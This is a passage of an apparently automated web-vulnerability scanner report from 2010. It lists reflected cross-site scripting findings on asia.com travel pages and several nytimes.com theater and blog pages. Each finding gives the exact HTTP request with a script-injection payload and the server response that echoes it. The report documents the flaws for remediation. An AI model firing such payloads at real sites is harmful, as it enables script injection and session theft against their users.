_gaq.push(['_trackPageview','zzzzzzzzzz/cheap-flights-countryf5784'-alert(1)-'530e8a7a41d/South-Korea/Search-South-Korea-Discount-Flights-And-Savezz']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == documen
...[SNIP]...

3.263. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://south-korea.travel.asia.com
Path:   /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25ad3<a>069c08e0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cheap-flights-country/South-Korea25ad3<a>069c08e0a3/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=rtrh0l4ibmql98cmhkcm9d8cu7; expires=Sat, 13 Nov 2010 12:38:37 GMT; path=/; domain=.asia.com
Content-Length: 35377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
<h1 class="headbottom">South Korea25ad3<a>069c08e0a3</h1>
...[SNIP]...

3.264. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://south-korea.travel.asia.com
Path:   /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5954"><a>798dc50e169 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cheap-flights-country/South-Koreae5954"><a>798dc50e169/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=qodc4iupgrp6i260a1lbjfbh31; expires=Sat, 13 Nov 2010 12:38:23 GMT; path=/; domain=.asia.com
Content-Length: 35476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
<meta name="description" content="Cheap Flights to South Koreae5954"><a>798dc50e169. Compare and Save on South-Koreae5954">
...[SNIP]...

3.265. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://south-korea.travel.asia.com
Path:   /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload febb6'-alert(1)-'5341485a6ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cheap-flights-country/South-Koreafebb6'-alert(1)-'5341485a6ff/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7s52tqi1hoaeb96jfihl6lu8e2; expires=Sat, 13 Nov 2010 12:38:36 GMT; path=/; domain=.asia.com
Content-Length: 35707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-51381-1']);
_gaq.push(['_setDomainName', 'asia.com']);
_gaq.push(['_trackPageview','SEMzzNewzzLandzz1Ozz0zz/cheap-flights-country/South-Koreafebb6'-alert(1)-'5341485a6ff/Search-South-Korea-Discount-Flights-And-Savezzzzf3yeu2x']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.l
...[SNIP]...

3.266. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://south-korea.travel.asia.com
Path:   /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 509bc<a>ab074ef237 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save509bc<a>ab074ef237 HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=fp5942mg4nmg1mlktallqnclm0; expires=Sat, 13 Nov 2010 12:38:54 GMT; path=/; domain=.asia.com
Content-Length: 40371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
" style="width:430px; color:#FFF; background:#FF0000; border:3px solid #FF0000; font-family:Arial, Helvetica, sans-serif; font-weight:bold; font-size:21px;">Search South Korea Discount Flights And Save509bc<a>ab074ef237</h2>
...[SNIP]...

3.267. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://south-korea.travel.asia.com
Path:   /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1252d'-alert(1)-'a696df30fcf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save1252d'-alert(1)-'a696df30fcf HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=1blfh1819b8k460ggmir6m41i4; expires=Sat, 13 Nov 2010 12:38:53 GMT; path=/; domain=.asia.com
Content-Length: 40391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
ccount', 'UA-51381-1']);
_gaq.push(['_setDomainName', 'asia.com']);
_gaq.push(['_trackPageview','SEMzzNewzzLandzz1Ozz0zz/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save1252d'-alert(1)-'a696df30fcfzzzzf3yeu2x']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://ww
...[SNIP]...

3.268. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/11/theater/reviews/11play.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29ca"><script>alert(1)</script>8ac0424ea4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/theater/reviews/11play.html?f29ca"><script>alert(1)</script>8ac0424ea4b=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:47 GMT
Content-type: text/html
Content-Length: 68739



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html?f29ca"><script>alert(1)</script>8ac0424ea4b=1&pagewanted=print">
...[SNIP]...

3.269. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/11/theater/reviews/11play.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4901d"><script>alert(1)</script>145c10824b3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/theater/reviews/11play.html?ref=todayspaper4901d"><script>alert(1)</script>145c10824b3 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:48 GMT
Content-type: text/html
Content-Length: 68956



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html?ref=todayspaper4901d"><script>alert(1)</script>145c10824b3&pagewanted=print">
...[SNIP]...

3.270. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [hpw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12peewee.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b39d2"><script>alert(1)</script>cd231d2e6c3 was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12peewee.html?hpwb39d2"><script>alert(1)</script>cd231d2e6c3 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:24 GMT
Content-type: text/html
Content-Length: 79431



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html?hpwb39d2"><script>alert(1)</script>cd231d2e6c3&pagewanted=print">
...[SNIP]...

3.271. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12peewee.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cbe6"><script>alert(1)</script>e0ebad57850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12peewee.html?5cbe6"><script>alert(1)</script>e0ebad57850=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:20 GMT
Content-type: text/html
Content-Length: 78591



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html?5cbe6"><script>alert(1)</script>e0ebad57850=1&pagewanted=print">
...[SNIP]...

3.272. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12peewee.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baacc"><script>alert(1)</script>15a1ee9d682 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12peewee.html?src=mv&ref=homepagebaacc"><script>alert(1)</script>15a1ee9d682 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:29 GMT
Content-type: text/html
Content-Length: 74993



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html?src=mv&ref=homepagebaacc"><script>alert(1)</script>15a1ee9d682&pagewanted=print">
...[SNIP]...

3.273. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12peewee.html

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39800"><script>alert(1)</script>06c62cb337d was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12peewee.html?src=mv39800"><script>alert(1)</script>06c62cb337d&ref=homepage HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:28 GMT
Content-type: text/html
Content-Length: 78724



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html?src=mv39800"><script>alert(1)</script>06c62cb337d&ref=homepage&pagewanted=print">
...[SNIP]...

3.274. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12radio.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4360"><script>alert(1)</script>b35e521cc06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12radio.html?e4360"><script>alert(1)</script>b35e521cc06=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:34 GMT
Content-type: text/html
Content-Length: 73582



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html?e4360"><script>alert(1)</script>b35e521cc06=1&pagewanted=print">
...[SNIP]...

3.275. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12radio.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40c2"><script>alert(1)</script>4c4bfb1960a was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12radio.html?ref=todayspapere40c2"><script>alert(1)</script>4c4bfb1960a HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:35 GMT
Content-type: text/html
Content-Length: 73498



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html?ref=todayspapere40c2"><script>alert(1)</script>4c4bfb1960a&pagewanted=print">
...[SNIP]...

3.276. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [hpw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12throne.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf18"><script>alert(1)</script>e48fb82009c was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12throne.html?hpw2bf18"><script>alert(1)</script>e48fb82009c HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:33 GMT
Content-type: text/html
Content-Length: 76207



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html?hpw2bf18"><script>alert(1)</script>e48fb82009c&pagewanted=print">
...[SNIP]...

3.277. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12throne.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e86"><script>alert(1)</script>e7c3b9810b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12throne.html?d5e86"><script>alert(1)</script>e7c3b9810b8=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:33 GMT
Content-type: text/html
Content-Length: 76202



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html?d5e86"><script>alert(1)</script>e7c3b9810b8=1&pagewanted=print">
...[SNIP]...

3.278. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/12/theater/reviews/12throne.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea66"><script>alert(1)</script>9e7ae8376cb was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12throne.html?ref=todayspaper6ea66"><script>alert(1)</script>9e7ae8376cb HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:34 GMT
Content-type: text/html
Content-Length: 76394



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html?ref=todayspaper6ea66"><script>alert(1)</script>9e7ae8376cb&pagewanted=print">
...[SNIP]...

3.279. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [hpw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/13/theater/reviews/13notes.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98792"><script>alert(1)</script>01a0c2a2969 was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/theater/reviews/13notes.html?hpw98792"><script>alert(1)</script>01a0c2a2969 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:43 GMT
Content-type: text/html
Content-Length: 75094



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html?hpw98792"><script>alert(1)</script>01a0c2a2969&pagewanted=print">
...[SNIP]...

3.280. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/13/theater/reviews/13notes.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dfee"><script>alert(1)</script>5d27ced1f19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/theater/reviews/13notes.html?9dfee"><script>alert(1)</script>5d27ced1f19=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:33 GMT
Content-type: text/html
Content-Length: 75056



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html?9dfee"><script>alert(1)</script>5d27ced1f19=1&pagewanted=print">
...[SNIP]...

3.281. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater.nytimes.com
Path:   /2010/11/13/theater/reviews/13notes.html

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97588"><script>alert(1)</script>2ae94431781 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/theater/reviews/13notes.html?src=twr97588"><script>alert(1)</script>2ae94431781 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:44 GMT
Content-type: text/html
Content-Length: 71369



...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html?src=twr97588"><script>alert(1)</script>2ae94431781&pagewanted=print">
...[SNIP]...

3.282. http://thecaucus.blogs.nytimes.com/2010/11/12/gov-perry-to-lead-republican-governors/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thecaucus.blogs.nytimes.com
Path:   /2010/11/12/gov-perry-to-lead-republican-governors/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980a3"><script>alert(1)</script>8eae5e2efea was submitted in the src parameter. This input was echoed as 980a3\"><script>alert(1)</script>8eae5e2efea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/gov-perry-to-lead-republican-governors/?src=twr980a3"><script>alert(1)</script>8eae5e2efea HTTP/1.1
Host: thecaucus.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:38:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://thecaucus.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 79479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
MNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Election+Update;Politics;Washington;Barack+Obama;Congress;Midterms;republican-governors-association;rick-perry;texas;the_caucus&src=twr980a3\"><script>alert(1)</script>8eae5e2efea">
...[SNIP]...

3.283. http://thequad.blogs.nytimes.com/2010/11/12/quad-qa-sienas-ryan-rossiter/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thequad.blogs.nytimes.com
Path:   /2010/11/12/quad-qa-sienas-ryan-rossiter/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5691"><script>alert(1)</script>08b3c1d1199 was submitted in the src parameter. This input was echoed as d5691\"><script>alert(1)</script>08b3c1d1199 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/quad-qa-sienas-ryan-rossiter/?src=twrd5691"><script>alert(1)</script>08b3c1d1199 HTTP/1.1
Host: thequad.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:39:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://thequad.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
